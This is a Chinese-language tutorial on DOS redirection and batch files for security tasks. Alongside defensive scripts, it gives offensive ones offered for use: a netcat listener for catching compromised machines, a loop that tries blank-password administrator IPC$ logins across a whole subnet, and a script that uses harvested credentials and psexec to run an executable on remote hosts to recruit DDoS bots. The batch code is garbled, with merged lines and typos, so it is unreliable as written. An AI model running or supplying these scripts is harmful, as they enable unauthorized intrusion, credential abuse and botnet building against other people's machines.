大家知道,DOS下有一个不为大家所常用的命令――重定向命令,这个小东西非常有用,该命令同样可以用于 Win9x/ME/2000/XP下,灵活的使用这个命令可以给我们带来很大的方便――无论是入侵还是防守抑或是系统应用,都会带来很大的便利。今天就让 我们来看几个重定向命令在安全方面的应用实例。
一、命令格式
DOS的标准输入输出通常是在标准设备键盘和显示器上进行的,利用重定向,可以方便地将输入输出改向磁盘文件或其它设备。其中:
(1).大于号“>”将命令发送到文件或设备,例如打印机>prn。使用大于号“>”时,有些命令输出(例如错误消息)不能重定向。
(2).双大于号“>>”将命令输出添加到文件结尾而不删除文件中已有的信息。
(3).小于号“<”从文件而不是键盘上获取命令所需的输入。
(4).>&符号将输出从一个默认I/O流(stdout,stdin,stderr)重新定向到另一个默认I/O流。
例如,command >output_file 2>&1将处理command过程中的所有错误信息从屏幕重定向到标准文件输出中。标准输出的数值如下所示:
标准输出 等价的数值
Stdin 0
Stdout 1
Stderr 2
其中,(1)和(2)都创建一个文件用于存放数据;(4)可能不能够在DOS下使用。
二、重定向命令的输出
几乎所有的命令均将输出发送到屏幕。即使是将输出发送到驱动器或打印机的命令,也会在屏幕上显示消息和提示。要将输出从屏幕重定向到文件或打印机,请使 用大于号(>)。大多数命令中均可以使用大于号。例如,在以下命令中,dir命令生成的目录列表重定向到Dirlist.txt文件: dir>dirlist.txt,如果Dirlist.txt文件不存在,系统将创建该文件。如果Dirlist.txt存在,系统将使用dir命 令的输出替换文件中的信息。
要将命令输出添加到文件结尾而不丢失文件中的任何信息,请使用双大于号(>>)。例如, 在以下命令中,dir命令生成的目录列表附加到Dirlist.txt文件中:dir>dirlist.txt,将输入重定向到一个命令,就象可以 将命令输出发送到文件或打印机而不是屏幕一样,您可以从文件而不是从键盘获取命令的输入。要从文件获取输入,请使用小于号(<)。例如,以下命令将 从List.txt文件中获取sort命令的输入:sort
三、应用举例
1.给注册表加锁/解锁
大家知道,注册表HKEY_CURRENT_USER/Software/Microsoft/Windows/CurrentVerssion/ Policies/System分支下的DWORD值“Disableregistrytools”的键值如为“1”,则可以给注册表加锁,这样别人就无 法使用注册表编辑器。利用重定向命令在DOS下就可以给注册表加锁/解锁,非常方便。
打开记事本程序,新建一个文本文件,输入如下内容:
@echo REGEDIT4>>123.reg@echo.>>123.reg@echo [HKEY_CURRENT_USER/Software/Microsoft/Windows/CurrentVersion/Policies/System]>>123.reg@echo "DisableRegistryTools"=dword:00000001>>123.reg@REGEDIT /S /C 123.reg@deltree /y 123.reg
另存为以.bat为扩展名的批处理文件,点击这个文件注册表就会被锁定!
在上面的命令中,echo是DOS下的回显命令,在它的前面加上“@”前缀字符,表示执行时本行在命令行或DOS里面不显示,如果想看到程序执行过程, 请将“@”去掉。大家在编写上述代码时要注意的是,第一行中的“REGEDIT4”一定要用大写字母,在第二行中“echo”和“.”之间没有空格。 “>>”产生的内容将追加到它后面的文件中。在文件的最后一行加上deltree /y 123.reg,就可以无需确认就删除123.reg文件。
要想给注册表解锁,可以编辑这个批处理文件,只需将 "DisableRegistryTools"=dword:00000001改为"DisableRegistryTools"=dword: 00000000,其他内容不变,保存为.bat文件,点击就可以给注册表解锁了。
2.把登陆3389的机器IP记录下来
把下面的内容保存为3389IP.bat:
time /t >>log.lognetstat -n -p tcp |find ":3389">>Log.logstart Explorer
运行3389IP.bat,然后查看log.log文件即可看到登陆3389的机器IP,是不是很方便呢?
3.恢复DOS实模式
大家知道,某些恶意网页会修改浏览者的注册表,在无所不用其极的各种手段中,修改注册表使DOS实模式不可用是其中的招数之一。要想恢复DOS实模式方法有很多,用批处理和重定向命令结合使用,是比较特别的一招,在此与大家分享。
echo offecho REGEDIT4>c:/scanreg.reg@echo.>>lock.regecho [HKEY_CURRENT_USER/SOFTWARE/Microsoft/Windows/CurrentVersion/Policies/WinOldApp]>>c:/scanreg.regecho "NoRealMode"=dword:00000000>>c:/scanreg.regregedit /s c:/scanreg.reg@del c:/scanreg.reg
另存为以.bat为扩展名的批处理文件,点击这个文件就可以恢复DOS实模式,那些DOS应用程序又可以使用了。
4.等待肉鸡上门
每天费时费力的找肉鸡是不是很辛苦,利用重定向命令和批处理文件就可以让你简单的找到肉鸡!方法是用记事本新建一个文本文件,输入如下内容:
@echo off:startnc -vv -w 5 -l -p 80>>rouji.loggoto start
保存为.bat文件(事先得准备好一个nc.exe文件,它是网络故障事件检测软件Netcat的主程序),然后运行此程序之后,你就等着肉鸡上门主动来找你吧!运气好的话,每天10个不成问题。
5.快速进行空连接
空连接是在没有信任的情况下与服务器建立的会话,换句话说,它是一个到服务器的匿名访问。使用命令net use //IP/ipc""/user:""就可以简单地和目标建立一个空连接(需要目标开放IPC)。利用重定向命令和for命令就可以对一个C类网段进行快速的空连接,并把结果保存到一个文件 中供你分析。方法是用记事本编辑如下内容的文件:
@echo offecho 格式:test *.*.*>test.txtfor /L %%G in (1 1 254) do echo %1.%%G >>test.txt & net use /%1.%%Gipc""/use:"Administrator"|find"命令完成">>test.txt
批处理文件保存为.bat,运行即可。这个批处理文件的功能是对你指定的一个C类网段中的254个ip依次试建立帐号为administrator口令为空的ipc连接,如果成功就把结果记录在test.txt。这样就实现了NT弱口令扫描功能!其中,for命令的功能是对一组文件中的每一个文件执行 某个特定命令,也就是可以用你指定的循环范围生成一系列命令。For命令的格式为:FOR %variable IN (set) DO command [command-parameters],具体的含义:
%variable:指定一个单一字母可替换的参数。
(set):指定一个或一组文件。可以使用通配符。
command:指定对每个文件执行的命令。
command-parameters:为特定命令指定参数或命令行开关。
在批处理文件中使用FOR命令时,指定变量请使用%%variable而不要用%variable。变量名称是区分大小写的,所以%i不同%I。
6.禁止空连接
空连接的存在对有一定的危险,所以我们还是禁止它为好!方法是输入net share察看本地共享资源,接下来输入如下命令删除共享:
net share ipc/deletenetshareadmin /delete
net share c/deletenetshared /delete(如果有e,f等盘符可以同法删除)
然后用记事本新建一个文本文件,输入如下内容即可:
@echo REGEDIT4>>123.reg@echo.>>123.reg@echo [HKEY_LOCAL_MACHINE/System/CurrentControlSet/Control/LSA]>>123.reg@echo "RestrictAnonymous"=dword:00000001>>123.reg@REGEDIT /S /C 123.reg@deltree /y 123.reg
另存为以.bat为扩展名的批处理文件,点击这个文件就可以禁止空连接。
7.扫描所有和本机以TCP协议连接的计算机
扫描自己的计算机端口,发现有特殊端口打开,可以查木马,不仅如此,利用下面这个批处理文件还可以把所有和本机以TCP协议连接的计算机IP地址都记录下来。这个.bat文件内容如下:
data /t>>123.logtime /t>>123.lognetstat -n -p tcp 10>>123.log
这样不仅可以记录下对方的IP,还有时间和日期,方便自己查看。
8.自动获取DDoS肉鸡
DDoS是Distributed Denial of Service的缩写,意即分布式拒绝服务攻击。它是指借助于客户/服务器技术,将多个计算机联合起来作为攻击平台,对一个或多个目标发动DoS攻击,从 而成倍地提高拒绝服务攻击的威力。通常,攻击者使用一个偷窃帐号将DDoS主控程序安装在一个计算机上,在一个设定的时间主控程序将与大量代理程序通讯, 代理程序已经被安装在Internet上的许多计算机上。代理程序收到指令时就发动攻击。利用客户/服务器技术,主控程序能在几秒钟内激活成百上千次代理 程序的运行。
虽然不建议大家使用DDoS方式攻击,但作为技术掌握还是很有必要的。可是,如何才能获取进行DDoS攻击的肉鸡呢?把下面的内容保存为ok.bat文件就可以达到目的了:
@echo offecho自动获取DDoS肉鸡for /f "tokens=1,3*" %i in (host.txt) do net use //%k/ipc/user:"/sysytem32if errorelevel 0 goto successpsexec -d //%i c:/winnt/system32/%1net user //%i/ipc$ /del:successecho ------------------------------>>success.txtecho 肉鸡:%i>>success.txtecho 用户名:%j>>success.txtecho 密码:%k>>success.txtecho ------------------------------>>success.txt
使用方法是ok.bat *.exe host.txt,其中host.txt的格式为:ip administrator password。好了,快试试吧。但不要用来干破坏哦。
其实,本文所说的方法主要是利用了批处理和相关的命令,重定向命令在其中只是个“传接剂”,起连接作用,但它的功劳也是不小的,所以我们不要忘了重定向命令哦。本文只是抛砖引玉,希望大家畅所欲言,多多指点。在写作时参阅过众多高手的论坛帖子,多谢各位。
新闻热点
疑难解答